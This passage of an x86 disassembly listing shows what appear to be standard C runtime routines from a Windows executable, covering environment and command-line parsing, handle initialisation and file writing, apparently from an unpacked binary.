cmp esi, ebx
jnz short loc_41DD14
jmp short loc_41DD34
; ---------------------------------------------------------------------------
loc_41DD04: ; CODE XREF: sub_41DCE4+34�j
cmp al, 3Dh
jz short loc_41DD09
inc edi
loc_41DD09: ; CODE XREF: sub_41DCE4+22�j
push esi
call sub_419D70
pop ecx
lea esi, [esi+eax+1]
loc_41DD14: ; CODE XREF: sub_41DCE4+1C�j
mov al, [esi]
cmp al, bl
jnz short loc_41DD04
lea eax, ds:4[edi*4]
push eax
call sub_416E1F
mov edi, eax
cmp edi, ebx
pop ecx
mov dword_4811A4, edi
jnz short loc_41DD39
loc_41DD34: ; CODE XREF: sub_41DCE4+1E�j
or eax, 0FFFFFFFFh
jmp short loc_41DD91
; ---------------------------------------------------------------------------
loc_41DD39: ; CODE XREF: sub_41DCE4+4E�j
mov esi, dword_4811C8
push ebp
jmp short loc_41DD6C
; ---------------------------------------------------------------------------
loc_41DD42: ; CODE XREF: sub_41DCE4+8A�j
push esi
call sub_419D70
mov ebp, eax
inc ebp
cmp byte ptr [esi], 3Dh
pop ecx
jz short loc_41DD6A
push ebp
call sub_416E1F
cmp eax, ebx
pop ecx
mov [edi], eax
jz short loc_41DD95
push esi
push eax
call sub_41BFE0
pop ecx
pop ecx
add edi, 4
loc_41DD6A: ; CODE XREF: sub_41DCE4+6B�j
add esi, ebp
loc_41DD6C: ; CODE XREF: sub_41DCE4+5C�j
cmp [esi], bl
jnz short loc_41DD42
push dword_4811C8
call sub_416D07
mov dword_4811C8, ebx
mov [edi], ebx
mov dword_48298C, 1
xor eax, eax
loc_41DD8F: ; CODE XREF: sub_41DCE4+C5�j
pop ecx
pop ebp
loc_41DD91: ; CODE XREF: sub_41DCE4+53�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41DD95: ; CODE XREF: sub_41DCE4+78�j
push dword_4811A4
call sub_416D07
mov dword_4811A4, ebx
or eax, 0FFFFFFFFh
jmp short loc_41DD8F
sub_41DCE4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DDAB proc near ; CODE XREF: sub_41DF17+54�p
; sub_41DF17+85�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_0], edx
push edi
mov [esi], edx
mov edi, ecx
mov dword ptr [ebx], 1
jz short loc_41DDCE
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_41DDCE: ; CODE XREF: sub_41DDAB+18�j
; sub_41DDAB+65�j ...
cmp byte ptr [eax], 22h
jnz short loc_41DDE1
xor ecx, ecx
test edx, edx
setz cl
inc eax
mov edx, ecx
mov cl, 22h
jmp short loc_41DE0E
; ---------------------------------------------------------------------------
loc_41DDE1: ; CODE XREF: sub_41DDAB+26�j
inc dword ptr [esi]
test edi, edi
jz short loc_41DDEC
mov cl, [eax]
mov [edi], cl
inc edi
loc_41DDEC: ; CODE XREF: sub_41DDAB+3A�j
mov cl, [eax]
movzx ebx, cl
inc eax
test byte_481721[ebx], 4
jz short loc_41DE07
inc dword ptr [esi]
test edi, edi
jz short loc_41DE06
mov bl, [eax]
mov [edi], bl
inc edi
loc_41DE06: ; CODE XREF: sub_41DDAB+54�j
inc eax
loc_41DE07: ; CODE XREF: sub_41DDAB+4E�j
test cl, cl
mov ebx, [ebp+arg_4]
jz short loc_41DE40
loc_41DE0E: ; CODE XREF: sub_41DDAB+34�j
test edx, edx
jnz short loc_41DDCE
cmp cl, 20h
jz short loc_41DE1C
cmp cl, 9
jnz short loc_41DDCE
loc_41DE1C: ; CODE XREF: sub_41DDAB+6A�j
test edi, edi
jz short loc_41DE24
and byte ptr [edi-1], 0
loc_41DE24: ; CODE XREF: sub_41DDAB+73�j
; sub_41DDAB+96�j
and [ebp+var_4], 0
loc_41DE28: ; CODE XREF: sub_41DDAB+157�j
cmp byte ptr [eax], 0
jz loc_41DF07
loc_41DE31: ; CODE XREF: sub_41DDAB+93�j
mov cl, [eax]
cmp cl, 20h
jz short loc_41DE3D
cmp cl, 9
jnz short loc_41DE43
loc_41DE3D: ; CODE XREF: sub_41DDAB+8B�j
inc eax
jmp short loc_41DE31
; ---------------------------------------------------------------------------
loc_41DE40: ; CODE XREF: sub_41DDAB+61�j
dec eax
jmp short loc_41DE24
; ---------------------------------------------------------------------------
loc_41DE43: ; CODE XREF: sub_41DDAB+90�j
cmp byte ptr [eax], 0
jz loc_41DF07
cmp [ebp+arg_0], 0
jz short loc_41DE5B
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_41DE5B: ; CODE XREF: sub_41DDAB+A5�j
inc dword ptr [ebx]
loc_41DE5D: ; CODE XREF: sub_41DDAB+145�j
xor ebx, ebx
inc ebx
xor edx, edx
jmp short loc_41DE66
; ---------------------------------------------------------------------------
loc_41DE64: ; CODE XREF: sub_41DDAB+BE�j
inc eax
inc edx
loc_41DE66: ; CODE XREF: sub_41DDAB+B7�j
cmp byte ptr [eax], 5Ch
jz short loc_41DE64
cmp byte ptr [eax], 22h
jnz short loc_41DE96
test dl, 1
jnz short loc_41DE94
cmp [ebp+var_4], 0
jz short loc_41DE87
lea ecx, [eax+1]
cmp byte ptr [ecx], 22h
jnz short loc_41DE87
mov eax, ecx
jmp short loc_41DE89
; ---------------------------------------------------------------------------
loc_41DE87: ; CODE XREF: sub_41DDAB+CE�j
; sub_41DDAB+D6�j
xor ebx, ebx
loc_41DE89: ; CODE XREF: sub_41DDAB+DA�j
xor ecx, ecx
cmp [ebp+var_4], ecx
setz cl
mov [ebp+var_4], ecx
loc_41DE94: ; CODE XREF: sub_41DDAB+C8�j
shr edx, 1
loc_41DE96: ; CODE XREF: sub_41DDAB+C3�j
test edx, edx
jz short loc_41DEA7
loc_41DE9A: ; CODE XREF: sub_41DDAB+FA�j
test edi, edi
jz short loc_41DEA2
mov byte ptr [edi], 5Ch
inc edi
loc_41DEA2: ; CODE XREF: sub_41DDAB+F1�j
inc dword ptr [esi]
dec edx
jnz short loc_41DE9A
loc_41DEA7: ; CODE XREF: sub_41DDAB+ED�j
mov cl, [eax]
test cl, cl
jz short loc_41DEF5
cmp [ebp+var_4], 0
jnz short loc_41DEBD
cmp cl, 20h
jz short loc_41DEF5
cmp cl, 9
jz short loc_41DEF5
loc_41DEBD: ; CODE XREF: sub_41DDAB+106�j
test ebx, ebx
jz short loc_41DEEF
test edi, edi
jz short loc_41DEDE
movzx edx, cl
test byte_481721[edx], 4
jz short loc_41DED7
mov [edi], cl
inc edi
inc eax
inc dword ptr [esi]
loc_41DED7: ; CODE XREF: sub_41DDAB+124�j
mov cl, [eax]
mov [edi], cl
inc edi
jmp short loc_41DEED
; ---------------------------------------------------------------------------
loc_41DEDE: ; CODE XREF: sub_41DDAB+118�j
movzx ecx, cl
test byte_481721[ecx], 4
jz short loc_41DEED
inc eax
inc dword ptr [esi]
loc_41DEED: ; CODE XREF: sub_41DDAB+131�j
; sub_41DDAB+13D�j
inc dword ptr [esi]
loc_41DEEF: ; CODE XREF: sub_41DDAB+114�j
inc eax
jmp loc_41DE5D
; ---------------------------------------------------------------------------
loc_41DEF5: ; CODE XREF: sub_41DDAB+100�j
; sub_41DDAB+10B�j ...
test edi, edi
jz short loc_41DEFD
and byte ptr [edi], 0
inc edi
loc_41DEFD: ; CODE XREF: sub_41DDAB+14C�j
inc dword ptr [esi]
mov ebx, [ebp+arg_4]
jmp loc_41DE28
; ---------------------------------------------------------------------------
loc_41DF07: ; CODE XREF: sub_41DDAB+80�j
; sub_41DDAB+9B�j
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_41DF11
and dword ptr [eax], 0
loc_41DF11: ; CODE XREF: sub_41DDAB+161�j
inc dword ptr [ebx]
pop edi
pop ebx
leave
retn
sub_41DDAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DF17 proc near ; CODE XREF: .text:004187BD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp dword_482998, edi
jnz short loc_41DF2E
call sub_41D4BB
loc_41DF2E: ; CODE XREF: sub_41DF17+10�j
and byte_481454, 0
push 104h
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push esi
push edi
call dword_422010 ; GetModuleFileNameA
mov eax, dword_482988
cmp eax, edi
mov off_4811B4, esi
jz short loc_41DF5D
cmp byte ptr [eax], 0
mov ebx, eax
jnz short loc_41DF5F
loc_41DF5D: ; CODE XREF: sub_41DF17+3D�j
mov ebx, esi
loc_41DF5F: ; CODE XREF: sub_41DF17+44�j
lea eax, [ebp+var_4]
push eax
push edi
lea esi, [ebp+var_8]
xor ecx, ecx
mov eax, ebx
call sub_41DDAB
mov esi, [ebp+var_4]
mov eax, [ebp+var_8]
shl esi, 2
add eax, esi
push eax
call sub_416E1F
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_41DF8F
or eax, 0FFFFFFFFh
jmp short loc_41DFB4
; ---------------------------------------------------------------------------
loc_41DF8F: ; CODE XREF: sub_41DF17+71�j
lea eax, [ebp+var_4]
push eax
lea ecx, [esi+edi]
push edi
lea esi, [ebp+var_8]
mov eax, ebx
call sub_41DDAB
mov eax, [ebp+var_4]
dec eax
pop ecx
mov dword_481198, eax
pop ecx
mov dword_48119C, edi
xor eax, eax
loc_41DFB4: ; CODE XREF: sub_41DF17+76�j
pop edi
pop esi
pop ebx
leave
retn
sub_41DF17 endp
; =============== S U B R O U T I N E =======================================
sub_41DFB9 proc near ; CODE XREF: .text:004187B3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_481458
push ebx
push ebp
push esi
push edi
mov edi, dword_4221CC
xor ebx, ebx
xor esi, esi
cmp eax, ebx
push 2
pop ebp
jnz short loc_41E002
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_41DFE9
mov dword_481458, 1
jmp short loc_41E007
; ---------------------------------------------------------------------------
loc_41DFE9: ; CODE XREF: sub_41DFB9+22�j
call dword_422008 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_41DFFD
mov eax, ebp
mov dword_481458, eax
jmp short loc_41E002
; ---------------------------------------------------------------------------
loc_41DFFD: ; CODE XREF: sub_41DFB9+39�j
mov eax, dword_481458
loc_41E002: ; CODE XREF: sub_41DFB9+1A�j
; sub_41DFB9+42�j
cmp eax, 1
jnz short loc_41E084
loc_41E007: ; CODE XREF: sub_41DFB9+2E�j
cmp esi, ebx
jnz short loc_41E013
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_41E08C
loc_41E013: ; CODE XREF: sub_41DFB9+50�j
cmp [esi], bx
mov eax, esi
jz short loc_41E028
loc_41E01A: ; CODE XREF: sub_41DFB9+66�j
; sub_41DFB9+6D�j
add eax, ebp
cmp [eax], bx
jnz short loc_41E01A
add eax, ebp
cmp [eax], bx
jnz short loc_41E01A
loc_41E028: ; CODE XREF: sub_41DFB9+5F�j
mov edi, dword_4220D8
push ebx
push ebx
push ebx
sub eax, esi
push ebx
sar eax, 1
inc eax
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_41E079
push ebp
call sub_416E1F
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_41E079
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_41E075
push [esp+18h+var_8]
call sub_416D07
pop ecx
mov [esp+18h+var_8], ebx
loc_41E075: ; CODE XREF: sub_41DFB9+AC�j
mov ebx, [esp+18h+var_8]
loc_41E079: ; CODE XREF: sub_41DFB9+8C�j
; sub_41DFB9+9B�j
push esi
call dword_4221C8 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_41E0D4
; ---------------------------------------------------------------------------
loc_41E084: ; CODE XREF: sub_41DFB9+4C�j
cmp eax, ebp
jz short loc_41E090
cmp eax, ebx
jz short loc_41E090
loc_41E08C: ; CODE XREF: sub_41DFB9+58�j
; sub_41DFB9+E1�j
xor eax, eax
jmp short loc_41E0D4
; ---------------------------------------------------------------------------
loc_41E090: ; CODE XREF: sub_41DFB9+CD�j
; sub_41DFB9+D1�j
call dword_4221C4 ; GetEnvironmentStringsA
mov esi, eax
cmp esi, ebx
jz short loc_41E08C
cmp [esi], bl
jz short loc_41E0AA
loc_41E0A0: ; CODE XREF: sub_41DFB9+EA�j
; sub_41DFB9+EF�j
inc eax
cmp [eax], bl
jnz short loc_41E0A0
inc eax
cmp [eax], bl
jnz short loc_41E0A0
loc_41E0AA: ; CODE XREF: sub_41DFB9+E5�j
sub eax, esi
inc eax
mov ebp, eax
push ebp
call sub_416E1F
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_41E0C0
xor edi, edi
jmp short loc_41E0CB
; ---------------------------------------------------------------------------
loc_41E0C0: ; CODE XREF: sub_41DFB9+101�j
push ebp
push esi
push edi
call sub_41B500
add esp, 0Ch
loc_41E0CB: ; CODE XREF: sub_41DFB9+105�j
push esi
call dword_4221C0 ; FreeEnvironmentStringsA
mov eax, edi
loc_41E0D4: ; CODE XREF: sub_41DFB9+C9�j
; sub_41DFB9+D5�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_41DFB9 endp
; =============== S U B R O U T I N E =======================================
sub_41E0DB proc near ; CODE XREF: .text:00418797�p
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 48h
push ebx
mov ebx, 480h
push ebx
call sub_416E1F
test eax, eax
pop ecx
jnz short loc_41E0F7
or eax, 0FFFFFFFFh
jmp loc_41E2D4
; ---------------------------------------------------------------------------
loc_41E0F7: ; CODE XREF: sub_41E0DB+12�j
mov dword_481600, eax
mov dword_4815F0, 20h
lea ecx, [eax+480h]
jmp short loc_41E12C
; ---------------------------------------------------------------------------
loc_41E10E: ; CODE XREF: sub_41E0DB+53�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov ecx, dword_481600
add eax, 24h
add ecx, 480h
loc_41E12C: ; CODE XREF: sub_41E0DB+31�j
cmp eax, ecx
jb short loc_41E10E
push ebp
push esi
push edi
lea eax, [esp+58h+var_44]
push eax
call dword_422168 ; GetStartupInfoA
cmp word ptr [esp+58h+var_14+2], 0
jz loc_41E233
mov eax, [esp+58h+var_10]
test eax, eax
jz loc_41E233
mov edi, [eax]
lea ebp, [eax+4]
lea eax, [edi+ebp]
mov [esp+58h+var_48], eax
mov eax, 800h
cmp edi, eax
jl short loc_41E16D
mov edi, eax
loc_41E16D: ; CODE XREF: sub_41E0DB+8E�j
cmp dword_4815F0, edi
jge short loc_41E1C3
mov esi, offset dword_481604
loc_41E17A: ; CODE XREF: sub_41E0DB+DE�j
push ebx
call sub_416E1F
test eax, eax
pop ecx
jz short loc_41E1BD
add dword_4815F0, 20h
mov [esi], eax
lea ecx, [eax+480h]
jmp short loc_41E1AC
; ---------------------------------------------------------------------------
loc_41E196: ; CODE XREF: sub_41E0DB+D3�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov ecx, [esi]
add eax, 24h
add ecx, ebx
loc_41E1AC: ; CODE XREF: sub_41E0DB+B9�j
cmp eax, ecx
jb short loc_41E196
add esi, 4
cmp dword_4815F0, edi
jl short loc_41E17A
jmp short loc_41E1C3
; ---------------------------------------------------------------------------
loc_41E1BD: ; CODE XREF: sub_41E0DB+A8�j
mov edi, dword_4815F0
loc_41E1C3: ; CODE XREF: sub_41E0DB+98�j
; sub_41E0DB+E0�j
xor ebx, ebx
test edi, edi
jle short loc_41E233
loc_41E1C9: ; CODE XREF: sub_41E0DB+156�j
mov eax, [esp+58h+var_48]
mov eax, [eax]
cmp eax, 0FFFFFFFFh
jz short loc_41E228
mov cl, [ebp+0]
test cl, 1
jz short loc_41E228
test cl, 8
jnz short loc_41E1EC
push eax
call dword_4221D4 ; GetFileType
test eax, eax
jz short loc_41E228
loc_41E1EC: ; CODE XREF: sub_41E0DB+104�j
mov ecx, ebx
mov eax, ebx
and eax, 1Fh
lea eax, [eax+eax*8]
sar ecx, 5
mov ecx, dword_481600[ecx*4]
lea esi, [ecx+eax*4]
mov eax, [esp+58h+var_48]
mov eax, [eax]
mov [esi], eax
mov al, [ebp+0]
mov [esi+4], al
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41EFD0
test eax, eax
pop ecx
pop ecx
jz short loc_41E253
inc dword ptr [esi+8]
loc_41E228: ; CODE XREF: sub_41E0DB+F7�j
; sub_41E0DB+FF�j ...
add [esp+58h+var_48], 4
inc ebx
inc ebp
cmp ebx, edi
jl short loc_41E1C9
loc_41E233: ; CODE XREF: sub_41E0DB+69�j
; sub_41E0DB+75�j ...
xor ebx, ebx
loc_41E235: ; CODE XREF: sub_41E0DB+1E2�j
mov ecx, dword_481600
lea eax, [ebx+ebx*8]
lea esi, [ecx+eax*4]
cmp dword ptr [esi], 0FFFFFFFFh
jnz short loc_41E2B5
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_41E258
push 0FFFFFFF6h
pop eax
jmp short loc_41E262
; ---------------------------------------------------------------------------
loc_41E253: ; CODE XREF: sub_41E0DB+148�j
; sub_41E0DB+1CD�j
or eax, 0FFFFFFFFh
jmp short loc_41E2D1
; ---------------------------------------------------------------------------
loc_41E258: ; CODE XREF: sub_41E0DB+171�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_41E262: ; CODE XREF: sub_41E0DB+176�j
push eax
call dword_4221B8 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41E2AF
push edi
call dword_4221D4 ; GetFileType
test eax, eax
jz short loc_41E2AF
and eax, 0FFh
cmp eax, 2
mov [esi], edi
jnz short loc_41E28D
or byte ptr [esi+4], 40h
jmp short loc_41E296
; ---------------------------------------------------------------------------
loc_41E28D: ; CODE XREF: sub_41E0DB+1AA�j
cmp eax, 3
jnz short loc_41E296
or byte ptr [esi+4], 8
loc_41E296: ; CODE XREF: sub_41E0DB+1B0�j
; sub_41E0DB+1B5�j
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41EFD0
test eax, eax
pop ecx
pop ecx
jz short loc_41E253
inc dword ptr [esi+8]
jmp short loc_41E2B9
; ---------------------------------------------------------------------------
loc_41E2AF: ; CODE XREF: sub_41E0DB+193�j
; sub_41E0DB+19E�j
or byte ptr [esi+4], 40h
jmp short loc_41E2B9
; ---------------------------------------------------------------------------
loc_41E2B5: ; CODE XREF: sub_41E0DB+169�j
or byte ptr [esi+4], 80h
loc_41E2B9: ; CODE XREF: sub_41E0DB+1D2�j
; sub_41E0DB+1D8�j
inc ebx
cmp ebx, 3
jl loc_41E235
push dword_4815F0
call dword_4221D0 ; SetHandleCount
xor eax, eax
loc_41E2D1: ; CODE XREF: sub_41E0DB+17B�j
pop edi
pop esi
pop ebp
loc_41E2D4: ; CODE XREF: sub_41E0DB+17�j
pop ebx
add esp, 48h
retn
sub_41E0DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E2D9 proc near ; CODE XREF: sub_41E47E+52�p
; sub_4209FE+91�p
var_420 = byte ptr -420h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 420h
mov eax, dword_432A68
xor eax, [ebp+4]
push edi
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+var_14], edi
mov [ebp+var_18], edi
jnz short loc_41E302
xor eax, eax
jmp loc_41E470
; ---------------------------------------------------------------------------
loc_41E302: ; CODE XREF: sub_41E2D9+20�j
mov eax, [ebp+arg_0]
push ebx
mov ebx, [ebp+arg_0]
and eax, 1Fh
sar ebx, 5
push esi
lea esi, [eax+eax*8]
lea ebx, ds:481600h[ebx*4]
mov eax, [ebx]
shl esi, 2
test byte ptr [eax+esi+4], 20h
jz short loc_41E335
push 2
push edi
push edi
push [ebp+arg_0]
call sub_420926
add esp, 10h
loc_41E335: ; CODE XREF: sub_41E2D9+4B�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_41E407
cmp [ebp+arg_8], edi
mov eax, [ebp+arg_4]
mov [ebp+var_10], eax
mov [ebp+var_8], edi
jbe loc_41E442
loc_41E355: ; CODE XREF: sub_41E2D9+F3�j
mov ecx, [ebp+var_10]
sub ecx, [ebp+arg_4]
lea eax, [ebp+var_420]
mov [ebp+var_C], edi
loc_41E364: ; CODE XREF: sub_41E2D9+B5�j
cmp ecx, [ebp+arg_8]
jnb short loc_41E390
mov edx, [ebp+var_10]
inc [ebp+var_10]
mov dl, [edx]
inc ecx
cmp dl, 0Ah
jnz short loc_41E381
inc [ebp+var_18]
mov byte ptr [eax], 0Dh
inc eax
inc [ebp+var_C]
loc_41E381: ; CODE XREF: sub_41E2D9+9C�j
mov [eax], dl
inc eax
inc [ebp+var_C]
cmp [ebp+var_C], 400h
jl short loc_41E364
loc_41E390: ; CODE XREF: sub_41E2D9+8E�j
mov edi, eax
lea eax, [ebp+var_420]
sub edi, eax
push 0
lea eax, [ebp+var_1C]
push eax
push edi
lea eax, [ebp+var_420]
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call dword_422030 ; WriteFile
test eax, eax
jz short loc_41E3D0
mov eax, [ebp+var_1C]
add [ebp+var_14], eax
cmp eax, edi
jl short loc_41E3D9
mov eax, [ebp+var_10]
sub eax, [ebp+arg_4]
xor edi, edi
cmp eax, [ebp+arg_8]
jb short loc_41E355
jmp short loc_41E3DB
; ---------------------------------------------------------------------------
loc_41E3D0: ; CODE XREF: sub_41E2D9+DC�j
call dword_422008 ; RtlGetLastWin32Error
mov [ebp+var_8], eax
loc_41E3D9: ; CODE XREF: sub_41E2D9+E6�j
xor edi, edi
loc_41E3DB: ; CODE XREF: sub_41E2D9+F5�j
; sub_41E2D9+14E�j ...
mov eax, [ebp+var_14]
cmp eax, edi
jnz loc_41E46B
cmp [ebp+var_8], edi
jz short loc_41E442
push 5
pop esi
cmp [ebp+var_8], esi
jnz short loc_41E434
call sub_41B9A5
mov dword ptr [eax], 9
call sub_41B9AE
mov [eax], esi
jmp short loc_41E43D
; ---------------------------------------------------------------------------
loc_41E407: ; CODE XREF: sub_41E2D9+64�j
push edi
lea ecx, [ebp+var_1C]
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call dword_422030 ; WriteFile
test eax, eax
jz short loc_41E429
mov eax, [ebp+var_1C]
mov [ebp+var_8], edi
mov [ebp+var_14], eax
jmp short loc_41E3DB
; ---------------------------------------------------------------------------
loc_41E429: ; CODE XREF: sub_41E2D9+143�j
call dword_422008 ; RtlGetLastWin32Error
mov [ebp+var_8], eax
jmp short loc_41E3DB
; ---------------------------------------------------------------------------
loc_41E434: ; CODE XREF: sub_41E2D9+118�j
push [ebp+var_8]
call sub_41B9B7
pop ecx
loc_41E43D: ; CODE XREF: sub_41E2D9+12C�j
; sub_41E2D9+190�j
or eax, 0FFFFFFFFh
jmp short loc_41E46E
; ---------------------------------------------------------------------------
loc_41E442: ; CODE XREF: sub_41E2D9+76�j
; sub_41E2D9+110�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_41E457
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jnz short loc_41E457
xor eax, eax
jmp short loc_41E46E
; ---------------------------------------------------------------------------
loc_41E457: ; CODE XREF: sub_41E2D9+170�j
; sub_41E2D9+178�j
call sub_41B9A5
mov dword ptr [eax], 1Ch
call sub_41B9AE
mov [eax], edi
jmp short loc_41E43D
; ---------------------------------------------------------------------------
loc_41E46B: ; CODE XREF: sub_41E2D9+107�j
sub eax, [ebp+var_18]
loc_41E46E: ; CODE XREF: sub_41E2D9+167�j
; sub_41E2D9+17C�j
pop esi
pop ebx
loc_41E470: ; CODE XREF: sub_41E2D9+24�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
call sub_41C596
leave
retn
sub_41E2D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E47E proc near ; CODE XREF: sub_418875+98�p
; sub_418875+EB�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0041E50D SIZE 0000001C BYTES
push 0Ch
push offset stru_42C9C8
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_4815F0
jnb short loc_41E50D
mov eax, ebx
sar eax, 5
lea edi, ds:481600h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41E50D
push ebx
call sub_41F5BC
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41E4DD
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_41E2D9
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_41E4F4
; ---------------------------------------------------------------------------
loc_41E4DD: ; CODE XREF: sub_41E47E+49�j
call sub_41B9A5
mov dword ptr [eax], 9
call sub_41B9AE
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_41E4F4: ; CODE XREF: sub_41E47E+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41E505
mov eax, [ebp+var_1C]
jmp short loc_41E523
sub_41E47E endp
; =============== S U B R O U T I N E =======================================
sub_41E502 proc near ; DATA XREF: .text:stru_42C9C8�o
mov ebx, [ebp+8]
sub_41E502 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41E505 proc near ; CODE XREF: sub_41E47E+7A�p
push ebx
call sub_41F62F
pop ecx
retn
sub_41E505 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41E47E
loc_41E50D: ; CODE XREF: sub_41E47E+15�j
; sub_41E47E+35�j
call sub_41B9A5
mov dword ptr [eax], 9
call sub_41B9AE
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41E523: ; CODE XREF: sub_41E47E+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41E47E
; =============== S U B R O U T I N E =======================================
sub_41E529 proc near ; CODE XREF: sub_418875+6F�p
; sub_41B1A6+34�p ...
arg_0 = dword ptr 4
inc dword_481338
push 1000h
call sub_416E1F
test eax, eax
pop ecx
mov ecx, [esp+arg_0]
mov [ecx+8], eax
jz short loc_41E552
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_41E563
; ---------------------------------------------------------------------------
loc_41E552: ; CODE XREF: sub_41E529+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_41E563: ; CODE XREF: sub_41E529+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_41E529 endp
; =============== S U B R O U T I N E =======================================
sub_41E56D proc near ; CODE XREF: sub_418875+64�p
; sub_41C5A4+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_4815F0
jb short loc_41E57C
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41E57C: ; CODE XREF: sub_41E56D+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_481600[ecx*4]
lea eax, [eax+eax*8]
movsx eax, byte ptr [ecx+eax*4+4]
and eax, 40h
retn
sub_41E56D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E597 proc near ; CODE XREF: sub_41E5F7+1E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
push esi
xor esi, esi
cmp ecx, esi
jnz short loc_41E5A8
xor eax, eax
jmp short loc_41E5F4
; ---------------------------------------------------------------------------
loc_41E5A8: ; CODE XREF: sub_41E597+B�j
mov eax, [ebp+arg_0]
cmp [eax+14h], esi
jnz short loc_41E5C1
mov ax, [ebp+arg_8]
cmp ax, 0FFh
ja short loc_41E5E6
mov [ecx], al
xor eax, eax
inc eax
jmp short loc_41E5F4
; ---------------------------------------------------------------------------
loc_41E5C1: ; CODE XREF: sub_41E597+17�j
lea edx, [ebp+arg_4]
push edx
push esi
push dword ptr [eax+28h]
mov [ebp+arg_4], esi
push ecx
push 1
lea ecx, [ebp+arg_8]
push ecx
push esi
push dword ptr [eax+4]
call dword_4220D8 ; WideCharToMultiByte
cmp eax, esi
jz short loc_41E5E6
cmp [ebp+arg_4], esi
jz short loc_41E5F4
loc_41E5E6: ; CODE XREF: sub_41E597+21�j
; sub_41E597+48�j
call sub_41B9A5
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
loc_41E5F4: ; CODE XREF: sub_41E597+F�j
